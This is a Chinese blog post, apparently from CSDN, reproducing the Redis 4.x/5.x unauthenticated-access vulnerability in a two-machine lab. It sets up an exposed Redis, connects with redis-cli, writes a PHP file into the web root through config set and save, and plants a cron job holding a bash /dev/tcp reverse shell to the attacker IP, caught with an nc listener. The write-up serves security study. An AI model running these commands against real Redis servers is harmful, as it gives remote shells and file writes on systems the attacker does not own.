Redis未授权访问4.x/5.x漏洞复现

已于 2023-04-13 14:47:19 修改
阅读量274 收藏 1
点赞数 1
文章标签: redis 数据库 linux 系统安全
于 2023-04-13 14:47:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49988054/article/details/129470225
版权

redis未授权4.x5.x复现(包括存在的问题)

Redis未授权访问漏洞原理

Redis在默认安装情况下,默认端口为6379;如果在配置的时候配置不当,没有添加过防火墙信任规则,修改默认端口等防护策略;使得直接暴露公网 并没有密码策略,使得任何用户都可以直接访问Redis。(利用条件:root权限、写入webshell(绝对路径))

vulhub搭建存在权限不是 root运行,看了很多文章还不知道怎么解决】

配置centos环境安装Redis

客户机【192.168.0.3】
攻击机【192.168.0.9】

官网下载3.2.9安装包

  1. wget http: / / download.redis.io/ releases/redis- 3.2.9.tar. gz
    请添加图片描述

  2. 解压下载的压缩包
    root@centos] # tar - zxvf redis-3.2.9.tar.gzredis-3.2.9 /
    请添加图片描述

  3. 进入解压后的文件
    执行make & make install
    请添加图片描述

    如果报错,可能是没安装gcc ,执行yum install gcc

  4. 更改下Redis配置文件redis.conf

    配置允许可以远程访问:在bind前面注释!并将protected-mode设置为no
    在这里插入图片描述

  5. 启动:redis- server redis.conf;
    在这里插入图片描述

  6. 未授权访问
    在攻击机nmap 192.168.0.3 -p 6379
    在这里插入图片描述
    查看Redis版本等信息
    在这里插入图片描述
    连接Redis未授权

攻击机需要安装连接工具:redis-cli
wget http://download.redis.io/releases/redis-5.0.7.tar.gz
tar xzf redis-5.0.7.tar.gz
make
cd /src

./ redis-cli -h 192.168.0.3

在这里插入图片描述

一:写入一句话木马

前提条件:root权限、知道绝对路径

config set dir /var/www/html
config set dbfilename test.php
set xxx "\n\n\n<?phpinfo();?>\n\n\n"
save

在这里插入图片描述
返回客户机查看一下是不是插入进去

在这里插入图片描述

二:反弹shell

1.开启nc,监听9999端口

nc -lvnp 9999

在这里插入图片描述
2.在客户机Redis里创建定时任务

set x "\n* * * * bash -i >& /dev/tcp/192.168.0.9/9999 0>&1\n"

config set dir /var/spool/cron/
config set dbfilename root
save

请添加图片描述
3.等待一分钟返回nc反弹
在这里插入图片描述

绫依呢
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)
XZ_______的博客
04-21 781
漏洞复现
漏洞复现】---- Redis 4.x/5.x 授权访问漏洞
qq_43168364的博客
12-24 1233
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库Redis提供了多种语言的API。Redis默认使用6379端口 Redis授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis授权访问在4.x/5.0.5以前
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
qq_50854662的博客
01-05 345
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
redies 4.x/5.x授权漏洞访问(实际情况6.x可能也有)(centos,kali)
最新发布
weixin_74182283的博客
03-27 480
漏洞原理:Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则 避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为 空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数 据。因为该漏洞授权访问登录漏洞,因此,攻击机上也应该有一个对应的redis版本,从而合理的对其进行攻击,安装命令与之前一样。kali服务关闭后,对应的靶机服务也会关闭。
Redis RCE 反弹shell 漏洞复现
06-07 1037
1 Redis简介 Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库,并提供多种语言的API 环境搭建
【简单复现Redis 4.x/5.x 授权访问漏洞
qq_45751902的博客
10-06 1056
开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限(我们可以将dir设置为一个目录A,而dbfilename为文件名B,再执行save或bgsave,则我们就可以写入一个路径为/A/B的任意文件。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,因为是实验环境,靶机端口没有改,redis密码没有设置(设置的话,需要爆破)等,这样将会将Redis服务暴露到公网上,如果在没有设置。
Redis 4.x/5.x 授权访问漏洞
roukmanx的博客
12-24 1315
本次对Redis授权访问漏洞的利用过程做个简单的记录。 前言: 在2019年7月7日结束的WCTF2019 Final上,LCBC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,这种利用方式更为通用,危害也更大,因此来学习学习 https://2018.zeronights.ru/wp-content/uploads/materials/15-redi...
Redis 4.x 5.x 授权访问
weixin_30610755的博客
07-10 151
环境搭建 5.0版本下载 wget http://download.redis.io/releases/redis-5.0.5.tar.gz tar xzf redis-5.0.0.tar.gz cd redis-5.0.5 make 修改配置文件运行远程访问 1、将redis.conf文件中的bind 127.0.0.1 这行前面加注释(#); 2、将redis.con...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
SpringBoot2.x整合Redis
02-24
最近在学习SpringBoot2.x整合Redis,在这里和大家分享一下,希望对大家有帮助。Redis是开源免费高性能的key-value数据库。有以下的优势(源于Redis官网):1.性能极高–Redis能读的速度是110000次/s,写的速度是81000...
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
redis desktop manager 2022.5.0.0 windows x64 exe安装包
10-09
redis desktop manager 2022.5.0.0 windows x64 exe安装包
redis集群安装 redis 6.x 安装包 redis-6.2.1_install.tar.gz
12-01
redis 6.x x86集群安装包,已经编译过的安装包,包括启动停止脚本,解压配置下ip就能搭建好redis集群
[Vulhub] Redis 4.x/5.x 授权访问漏洞
weixin_45605352的博客
07-16 2591
0x00 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /roo
【vulhub漏洞复现redis 4-unacc 授权访问漏洞
RexHa的博客
03-03 4482
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
Redis 4.x/5.x IDOR漏洞复现
qq_43571759的博客
05-27 335
Redis 4.x/5.x 授权访问漏洞 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 漏洞复现 最近碰到ctf的题目是通过ssrf和redis授权访问打入内网getshell,想着用docker复现以下此漏洞。 拉取环境开启环境后,如图 使用redis-cli -h your-ipj即可连接redis数据库,并且可以清空所有数据,即有授权访问漏洞 使用poc实现远程命令执行 先将下载好的poc目录下
redis授权访问漏洞
qq_42526270的博客
12-25 997
一. 应用介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。和Memcached类似,它支持存储的value 类型相对更多,包括 string(字符串)、list ( 链表)、 set(集合)、zset(sorted set – 有序集合)和 hash(哈希类型)。这些数据类型都支持push/pop 、 add/remove ...
【转载】Redis最新漏洞,删库勒索+跑路!!!
weixin_34080903的博客
09-11 219
9月10日下午15:06开始,阿里云官方首次发现一起规模化利用Redis 授权访问漏洞进行加密货币勒索的事件,阿里云上防御系统在攻击开始的10s内就已开启全网拦截。与以往的只是通过算力窃取进行挖矿的攻击事件不同,此次攻击者在攻击之初就是以勒索钱财作为第一目的的,攻击者无惧暴露,非常猖狂。直接删除数据、加密数据也意味着攻击者与防御者之间已经没有缓冲地带,...
给这段配置文件添加注释services: ruoyi-redis: container_name: ruoyi-redis image: redis build: context: ./redis ports: - "9063:6379" volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf - ./redis/data:/data command: redis-server /home/ruoyi/redis/redis.conf
06-09
- ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf # Redis配置文件映射 - ./redis/data:/data # Redis数据目录映射 command: redis-server /home/ruoyi/redis/redis.conf # 启动Redis服务的命令 ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值